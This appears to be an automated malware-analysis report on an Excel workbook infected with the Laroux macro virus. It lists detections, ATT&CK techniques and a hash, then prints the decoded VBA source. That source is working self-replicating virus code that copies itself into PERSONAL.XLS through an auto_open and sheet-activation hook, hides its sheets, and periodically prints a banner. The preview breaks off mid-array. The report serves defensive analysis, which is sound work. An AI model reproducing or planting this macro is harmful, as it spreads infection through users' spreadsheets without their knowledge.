Verdict: MALICIOUS (Risk Score: 240)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is identified as the Laroux macro virus, a known Excel-based threat. It contains an Auto_Open macro that copies the malicious macro to PERSONAL.XLS, ensuring execution whenever Excel is launched. This establishes persistence by modifying the startup behavior of Excel.
Heuristics 4
- ClamAV: Xls.Trojan.Laroux-15 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Laroux-15
- Excel 5 Laroux/Larou-CV macro-virus marker cluster (critical, OLE_XLS5_LAROUX_MACRO_VIRUS): Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15086 bytes |

SHA-256: 40ca00f337e7e95cb890baf5ec1393f3742cba663c7fa352950955d19f62b02e
Detection: ClamAV: Xls.Trojan.Laroux-15
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "larouXYZ"
Option Explicit
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "larouXYZ.larouXYZ"
End Sub
Sub larouXYZ()
On Error GoTo larouXYZ_Error
Dim Temp As String
Static Cnt As Integer
Application.ScreenUpdating = False
If Dir$(Application.StartupPath & "\" & "PERSONAL.XLS") = "" Then
Sheets("larouXYZ").Copy
Temp = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks(Temp).SaveAs Filename:=Application.StartupPath & "/" & "PERSONAL.XLS", FileFormat:=xlNormal _
, Password:="", WriteResPassword:="", ReadOnlyRecommended:=False, CreateBackup:=False
Else
If Sheets(1).Name <> "larouXYZ" Then
Workbooks("PERSONAL.XLS").Sheets("larouXYZ").Copy Before:=ActiveWorkbook.Sheets(1)
End If
End If
Cnt = Cnt + 1
If Cnt > 7 Then
Cnt = 0
Print_larouXYZ
End If
Application.OnSheetActivate = "PERSONAL.XLS!larouXYZ.larouXYZ"
Windows("PERSONAL.XLS").Visible = False
Workbooks("PERSONAL.XLS").Saved = True
Sheets("larouXYZ").Visible = False
ActiveWorkbook.Saved = True
Application.ScreenUpdating = True
Exit Sub
larouXYZ_Error:
Exit Sub
End Sub
Sub Print_larouXYZ()
Attribute Print_larouXYZ.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo Print_larouXYZ_Error
Const MAX_COL = 62
Const MAX_ROW = 38
Dim Title(0 To MAX_ROW - 1) As String
Dim Row As Integer
Dim Col As Integer
Cells.ColumnWidth = 1
Cells.RowHeight = 7
Cells(1, 1) = "larouXYZ Ver0.01"
Title(0) = "11111000000000000000000000000000000000000000000000000000000000"
Title(1) = "01111000000000000000000000000000000000000000000000000000000000"
Title(2) = "01111000000000000000000000000000000000000000000000000000000000"
Title(3) = "01111000000000000000000000000000000000000000000000000000000000"
Title(4) = "01111000000000000000000000000000000000000000000000000000000000"
Title(5) = "01111000000000000000000000000000000000000000000000000000000000"
Title(6) = "01111000000111111000001111100111000001111110000011111001111100"
Title(7) = "01111000011000111100000111101111100011100111000001111000111100"
Title(8) = "01111000111000011110000111110111100111000011100001111000111100"
Title(9) = "01111000111100011110000111100011001111000011110001111000111100"
Title(10) = "01111000011000011110000111100000001111000011110001111000111100"
Title(11) = "01111000000001111110000111100000001111000011110001111000111100"
Title(12) = "01111000000110011110000111100000001111000011110001111000111100"
Title(13) = "01111000011100011110000111100000001111000011110001111000111100"
Title(14) = "01111000111100011110000111100000001111000011110001111000111100"
Title(15) = "01111000111100111110000111100000000111000011100001111001111100"
Title(16) = "01111000111111011111000111100000000011100111000001111111111100"
Title(17) = "11111100011110001110001111110000000001111110000000111110111110"
Title(18) = "00000000000000000000000000000000000000000000000000000000000000"
Title(19) = "00000000000000000000000000000000000000000000000000000000000000"
Title(20) = "00011111111100111111100111111110000011111001111111111111100000"
Title(21) = "00000111110000001110000011111000000000110001110000001111000000"
Title(22) = "00000111110000001000000001111100000000100001100000011111000000"
Title(23) = "00000011111000010000000000111100000001100001100000111110000000"
Title(24) = "00000001111000010000000000011110000001000001000000111100000000"
Title(25) = "00000000111100100000000000011110000010000000000001111100000000"
Title(26) = "00000000111111000000000000001111000010000000000001111000000000"
Title(27) = "00000000011110000000000000001111000100000000000011111000000000"
Title(28) = "00000000011111000000000000000111101000
... (truncated)